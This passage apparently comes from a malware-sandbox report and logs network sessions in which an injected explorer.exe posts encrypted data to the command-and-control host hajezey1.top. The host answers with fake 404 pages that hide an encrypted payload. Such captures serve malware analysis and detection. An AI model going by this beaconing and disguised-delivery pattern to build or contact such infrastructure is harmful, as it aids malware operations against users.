f2 b2 6a 05 85 85 0a 9f 12 6f 03 62 53 b5 f8 80 99 8b 84 80 7f 1d b8 78 c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 c7 8e 07 e8 df 4a 17 7a 8d 42 14 7e 26 a0 81 ba 07 47 7d bb fb ce 3b 33 f0 82 6c 27 b4 e3 e4 ce 70 68 98 3b 6a fe da 3d b3 f5 3f 78 81 42 7b f9 e8 f0 85 a5 46 e5
                                                                                                                          Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|M+%t+xQ<e2P0YObyT=a'4! YU\dIXKg[Ge92)g z6\E'}WpHk"HI?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!UvyOZ:-A%GkKm@NQ>[J8},s"JG0Z"?kQTJMQCd%\!&Q#F<pvA>C/CbGBj4VFv2Bo]6HPg5P[Fj6'NGc_,/DO9W%bJR}Tzl9^\mc=>"}h`1%@GN!K.iwA0!Wnawjg";kzRN{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;=g&9c0{%#=9FX?SCnv4ddOU^Tiz=p.jh"?Gqf<=g?$W-{ir[6dQ;}5C%I(A5:/b"'v(5Y5jobSxF/Mv#JzB~&G};3l'ph;j=?xB{F
                                                                                                                          Oct 29, 2021 17:06:48.140593052 CEST7128INData Raw: bb 63 eb 97 62 c6 70 d9 31 d3 48 45 72 08 8e c1 6c c4 f3 bc f0 be bf 3e 00 d0 6f 88 05 42 76 8c 9e 94 74 8d 47 41 99 84 05 8c e3 ec 9c 6d 56 30 c8 35 61 dd a7 36 09 c7 3e 76 f3 6b df c8 a7 d3 71 5d 03 45 3b e9 b4 15 54 57 70 3b 8b 38 7c e0 b5 55
                                                                                                                          Data Ascii: cbp1HErl>oBvtGAmV05a6>vkq]E;TWp;8|U*fG3Q2 !Sj^*OM-GIKUtJYAVl>|5F)s_S3kD--(X!+]1B#&;mW>=H|a0//1
                                                                                                                          Oct 29, 2021 17:06:48.140620947 CEST7129INData Raw: 67 72 b1 90 17 d6 13 88 bd 8c 88 a4 cb 39 fc d0 f6 a4 6d cb 7d 7b df 3e 86 59 15 7c ce b7 a2 a0 6c a8 1c 94 53 5a 61 5f 29 c9 f9 dc 9b 27 58 b8 ad 7c 0a 9e 68 fa 03 2f dc ec 5c ee a5 9e b6 77 b2 62 c1 2a 6a ac a6 cd 97 a8 c1 13 f4 6c 81 c2 eb 98
                                                                                                                          Data Ascii: gr9m}{>Y|lSZa_)'X|h/\wb*jl]_L4Yx}ZnQ.C6{N[-n~*52bg}MH>OuR>#AZDsC_kT\1zu@.r)7:R>qS=#
                                                                                                                          Oct 29, 2021 17:06:48.140642881 CEST7131INData Raw: 83 da e5 3c 8a 86 60 07 42 99 7d 83 3d 9b f5 8d 3f e3 1e 40 8f 85 58 4b 44 80 02 ce a3 a7 bf 09 df 10 66 b8 c7 fc 3d 17 cd b2 b3 fd 67 6c fa 88 6c 20 09 9e 59 a6 56 69 b7 7a b1 6a df 1c 85 da 9c f1 61 6f 47 04 72 78 87 dd 84 2b b8 b4 c9 8d 24 47
                                                                                                                          Data Ascii: <`B}=?@XKDf=gll YVizjaoGrx+$GRTv!8IXf,W*0:FJpSz)%$%^:{-u@[l{4[`VSr&FjW*h:!v #N:<Id,b7)di( nUM
                                                                                                                          Oct 29, 2021 17:06:48.140667915 CEST7132INData Raw: 88 66 53 73 4c 6e 1c 51 61 2f d0 47 c6 77 4d 13 ae f7 53 ee db 7b a2 dd d3 48 75 78 ed 87 0a 3c 84 b5 b9 29 4d 31 e0 d5 d4 a9 d1 a2 00 40 42 94 be 8b 03 68 5a bf 2e d9 6d e5 66 21 25 16 d9 3e 11 b2 dd 07 6d 7e 03 7b a5 52 5a 0e f6 0c 87 ec 40 92
                                                                                                                          Data Ascii: fSsLnQa/GwMS{Hux<)M1@BhZ.mf!%>m~{RZ@d+Uu)7`|QME{Qj.x}/xbF2Q QQv$P,fpUuq?q5]+2o>l*K_$m ?\a?L >yG7GUw#=Q{(ivxf&;t
                                                                                                                          Oct 29, 2021 17:06:48.140691042 CEST7133INData Raw: 80 27 9f 37 91 e3 fd 60 4f b6 2a 52 e0 09 d6 35 74 c1 3a fa e4 ce 8d a1 b6 00 e2 5f f4 4e c1 ed 5e f9 e2 29 67 27 fc f2 22 05 4e d8 13 cf 85 06 f7 98 cc 49 2c 8e 7a e9 4d 2f f2 3c 00 c3 aa 8a 2b d3 c9 09 d1 f9 b0 3c 59 e4 84 6b 18 29 ed fd 09 7f
                                                                                                                          Data Ascii: '7`O*R5t:_N^)g'"NI,zM/<+<Yk)xfOg.kQ;OZ!tBQ,!4S'v$>v9gUzS`Hgl'L_6r tJIs#+7i*m:tRih8V"Gmkn[#`xT5NIs
                                                                                                                          Oct 29, 2021 17:06:48.140712023 CEST7135INData Raw: 47 7b 94 d2 a3 49 39 98 48 a1 db fb 87 cf 2c a5 4d cd 83 82 13 a7 1e e1 19 80 32 7a 5c 85 06 7a c4 53 e5 bb a6 dc 19 71 c4 4c c5 3b 59 cd 78 23 89 f5 11 db c8 79 8f 57 07 37 55 df 58 c5 4e 13 8d cf c4 0c c1 9b 4b e3 7d 5c 65 77 66 38 47 d3 96 14
                                                                                                                          Data Ascii: G{I9H,M2z\zSqL;Yx#yW7UXNK}\ewf8Gg=sRk_7-9YHH<I4:RqGM<ZLWggR'3uB'$@HE8Y}]jmv?2000vS`;Ao@%g647;jk%jK/df-
                                                                                                                          Oct 29, 2021 17:06:48.140734911 CEST7136INData Raw: a8 06 0c e8 7f 36 2e 98 7b a6 bb 34 16 c6 71 81 b3 8c 7e 38 23 52 07 70 1d 15 bc d6 21 37 6e 61 71 d1 c1 b9 f7 0a d1 c6 ac d8 54 c3 92 ae 30 5a 93 7a 14 2f 14 d2 e3 94 97 a7 57 57 be c0 57 8e 85 63 f2 13 5b ca 4a a1 67 45 38 ae d8 46 8c c3 68 bc
                                                                                                                          Data Ascii: 6.{4q~8#Rp!7naqT0Zz/WWWc[JgE8FhsW-\SpH:.Zzzom,xnX_Bz=:l!<Wp@FK.+lcig$h{)0"Dq/WH/`v8`w:4%0dD
                                                                                                                          Oct 29, 2021 17:06:48.140757084 CEST7138INData Raw: 70 ce b3 a6 39 32 dd 00 07 3f 66 02 14 f0 4c c0 cf 32 e1 ce d2 7b 3b 20 56 75 1a d6 bb f9 b8 4a cc 24 c1 13 36 d5 51 be 59 70 57 e6 64 52 e8 49 62 29 08 16 28 83 34 bd 3d 1e 0b 15 29 23 be 63 04 b7 49 22 1c 7e 11 10 de d6 03 09 3d dc 23 c0 74 73
                                                                                                                          Data Ascii: p92?fL2{; VuJ$6QYpWdRIb)(4=)#cI"~=#tss$)xHu&A vg4g{E?2{)7fteL}m z8+T|FG(o:'?:*7r3C_%XF*-jzH/J`b9rOTF571
                                                                                                                          Oct 29, 2021 17:06:48.140778065 CEST7139INData Raw: 31 f2 33 fb 35 91 c2 26 81 b9 85 6a ea 51 c7 c4 33 2d c7 28 11 6d 66 c7 fc d0 aa af 2a 01 d7 35 41 a6 e3 db f4 0b 35 10 a6 3a f4 09 88 6f 6f 60 2e e0 0f f1 81 1b 1f 65 64 b7 e4 2a 10 f2 d2 5c e2 3d 42 7f cb 42 14 63 02 e7 b5 90 1b 4c 3f 8e 8e 3f
                                                                                                                          Data Ascii: 135&jQ3-(mf*5A5:oo`.ed*\=BBcL??IQd=b02]dvQ[$'] P\rg9@L(pnD}eAl0WoZ#k"}y$`Bo>>Rro2W,.E~T$xuu]]:LS=q
                                                                                                                          Oct 29, 2021 17:06:48.193557024 CEST7140INData Raw: 6b af 3a 79 b9 22 99 bd e3 07 b4 23 e8 8a bd ef bf 8c 1a 3e 42 ea 05 00 31 40 aa f7 d1 aa 29 57 70 33 61 b0 ec ea 9d 46 0a 33 e7 80 a7 54 f7 a5 91 dc b1 4c 05 85 39 df c3 75 48 af 6c fc 82 8a 6b 52 77 21 c3 6c e5 c9 32 98 75 10 74 85 e7 8f 19 8a
                                                                                                                          Data Ascii: k:y"#>B1@)Wp3aF3TL9uHlkRw!l2utY'%voA2f/,;zpG7_gxb<ASp>U7Y,9f1O ^"@&(7Nqw#Fn`0/};%*Pt^


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          29192.168.2.749822185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:51.458595991 CEST7294OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://macmw.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 185
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:51.458633900 CEST7294OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 8e 66 5d 02 c9 a1 c1 64 25 a1 b6 33
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d%3a:H_0RY5_ ^lk(*{G\'!4/t*c;LAHVE/g-AH
                                                                                                                          Oct 29, 2021 17:06:51.538223028 CEST7294INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:51 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          3192.168.2.74981781.177.141.36443C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          30192.168.2.749823185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:51.640086889 CEST7295OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://lqkdg.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 317
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:51.640106916 CEST7296OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8f 66 5d 02 c8 a1 c1 64 58 b8 d4 32
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dX2WkU7k`CL1j{95?S9F*@S^iwOWX*][OnA<t8v_Wm){PLX1m{iE{W%J5GIR=%1
                                                                                                                          Oct 29, 2021 17:06:51.717535973 CEST7296INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:51 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          31192.168.2.749824185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:51.805845976 CEST7297OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bdliq.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 190
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:51.805865049 CEST7297OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 18 dd df 20
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d /!m3O2?{uwLc`5d/]OR1'xceQAR-HTU[2:QmCxoM!h
                                                                                                                          Oct 29, 2021 17:06:51.888117075 CEST7298INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:51 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          32192.168.2.749825185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:51.970746994 CEST7299OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://caojtt.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 250
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:51.970782995 CEST7299OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8d 66 5d 02 c8 a1 c1 64 2f a3 8c 1e
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d/oyMJ8m@b>C#:HxKR_2Zls(`'dObvC;tiZ!{ie5NsH.K_IpRaa~^/>EezAM
                                                                                                                          Oct 29, 2021 17:06:52.049025059 CEST7300INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:52 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          33192.168.2.749826185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:52.138217926 CEST7301OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://exjwgsme.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 285
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:52.138231039 CEST7301OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8a 66 5d 02 c8 a1 c1 64 38 9e ac 20
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d8 Y[*TXTV>7mOAj=a5{3WpXzyQ5<uCX-.=wG/lgv*lws{|TyUZdF^^L8rr{ Y;DG
                                                                                                                          Oct 29, 2021 17:06:52.215660095 CEST7302INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:52 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 42 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 76 92 71 06 45 a6 3e 11 dc a4 a3 a6 7e d8 6c a2 05 09 17 f6 cb ee 72 76 25 3f 50 19 01 bf 01 ea 53 01 b3 15 20 f5 3b e2 2a c2 d5 71 18 46 9b 3d f9 5c 40 8f ba f1 80 fe 05 b5 79 9e 10 b0 fb 14 9e 76 e9 bb 27 58 a4 0c 87 05 f0 bf 5f 60 08 d9 eb a8 e1 48 a8 03 88 31 7c 3b 66 ab 4b 11 c0 4d 08 0e 77 13 9e 09 5f 47 0b 5d 16 75 32 39 c5 f7 15 67 aa cf d0 c0 78 9e 0d a3 75 c1 96 52 88 36 19 ff bd 88 13 d8 06 0e 25 4f 12 7d 6f ed e0 04 89 19 d7 57 80 90 30 89 ec f4 4a 6b b6 f0 a2 22 4d 32 d3 49 ad ff bc ff 1a fd f4 3f f4 6f d3 7c cb c6 a8 cc 4e 4d b3 0b 97 2a 60 55 59 ad 30 fb 83 3b 3b ca c3 f3 b2 ec 92 90 1f 1c 57 fe 87 7e 0c 35 8a 3d 40 7f d0 56 81 96 9b 97 9e 70 9f 8a a2 25 44 5a c9 b2 cb 99 64 21 68 85 d2 f8 b8 56 b0 40 f6 0a bf 8b 71 91 e0 55 d0 66 21 df 76 79 27 e4 21 94 42 22 d1 3a 0d b4 43 06 1e 27 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 f0 d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 91 3d 4b 04 78 2d 7f 14 2c d6 e8 b1 14 73 71 10 22 07 4a 86 97 31 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 70 9c 82 97 d1 d6 4a 13 a7 e9 4d 51 c2 41 64 e3 53 39 f5 c3 a3 23 0c 28 df 52 d2 eb f9 23 19 9d 8c 3f 70 36 45 ae e4 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 f8 62 47 22 0b 85 d4 ca 55 56 9b 46 76 1d f3 13 02 63 34 42 c2 0c ce ae 70 85 96 36 e2 48 50 67 74 50 b8 87 f6 bc 81 de fb 6e 6a f6 e1 7b 54 3c 81 d2 be 95 df e2 63 10 ec 88 c0 5d 14 66 f2 e6 2f 59 47 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 65 f5 b8 90 c4 f7 07 26 67 1e 54 7a 54 4f 38 c0 5e 33 25 1b 6e 47 94 be 07 13 de 9a 3e 05 22 7d e6 b2 68 60 b9 10 31 eb 8d fc 25 57 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af dd c6 83 41 67 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 